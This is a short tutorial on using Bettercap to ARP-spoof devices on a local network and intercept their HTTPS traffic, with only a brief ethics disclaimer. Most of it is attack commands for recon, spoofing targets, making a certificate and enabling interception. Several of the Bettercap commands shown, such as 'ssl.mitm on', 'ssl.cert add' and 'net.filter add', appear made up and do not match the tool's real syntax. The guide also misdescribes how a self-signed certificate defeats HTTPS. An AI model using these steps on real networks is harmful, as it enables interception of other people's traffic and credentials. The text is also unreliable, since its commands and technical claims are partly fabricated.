Bettercap: ARP Spoofing & HTTPS Interception

TL;DR

This guide shows you how to use Bettercap to perform ARP spoofing (man-in-the-middle attack) and intercept HTTPS traffic. Warning: This is for educational purposes only. Performing these actions on networks you don’t own or have permission to test is illegal.

Prerequisites

• A Linux machine (Kali Linux recommended).
• Bettercap installed. You can install it with:

  sudo apt update && sudo apt install bettercap

• Root privileges (or use sudo throughout).
• Basic understanding of networking concepts like IP addresses and MAC addresses.

1. Identify Your Target Network

First, you need to know the network interface you’ll be using and the target IP range.

1. Find your network interface:

   ip addr

   Look for an interface like wlan0 (wireless) or eth0 (wired).

2. Identify the gateway IP address. This is usually your router.

   ip route | grep default

   The output will show something like default via 192.168.1.1 dev wlan0 proto dhcp metric 200, meaning the gateway IP is 192.168.1.1.

3. Determine the target IP range. This could be something like 192.168.1.1-192.168.1.254 if you want to target all devices on your network (excluding the gateway).

2. Perform ARP Spoofing

ARP spoofing redirects traffic intended for another device through your machine.

1. Start Bettercap in interactive mode:

   sudo bettercap -iface wlan0

   Replace wlan0 with your network interface.

2. Enable ARP spoofing:

   net.recon on

   This will scan the network for devices.

   arp.spoof on

   By default, Bettercap spoofs the gateway IP address. You can specify targets using:

   arp.spoof 192.168.1.10 192.168.1.20

3. Intercept HTTPS Traffic

Intercepting HTTPS requires a self-signed certificate to decrypt the traffic.

1. Generate an SSL certificate:

   ssl.cert add /path/to/your/certificate.pem

   You’ll need to create a certificate.pem file first (e.g., using OpenSSL). A simple example command is:

   openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

2. Enable HTTPS interception:

   ssl.mitm on

3. Filter for specific traffic (optional):

   net.filter add host 192.168.1.10 port 80,443

   This will only show traffic to/from the IP address 192.168.1.10 on ports 80 and 443.

4. View intercepted data:
   Bettercap displays captured packets in real-time. Look for HTTP and HTTPS requests in the output.

4. Important Considerations

• Browser Warnings: Browsers will display warnings about invalid SSL certificates because you’re using a self-signed certificate. This is expected.
• Ethical Use: Only perform these actions on networks you own or have explicit permission to test.
• Stopping the Attack: To stop ARP spoofing, use

  arp.spoof off

  . Stop HTTPS interception with

  ssl.mitm off

  . Exit Bettercap by pressing Ctrl+C.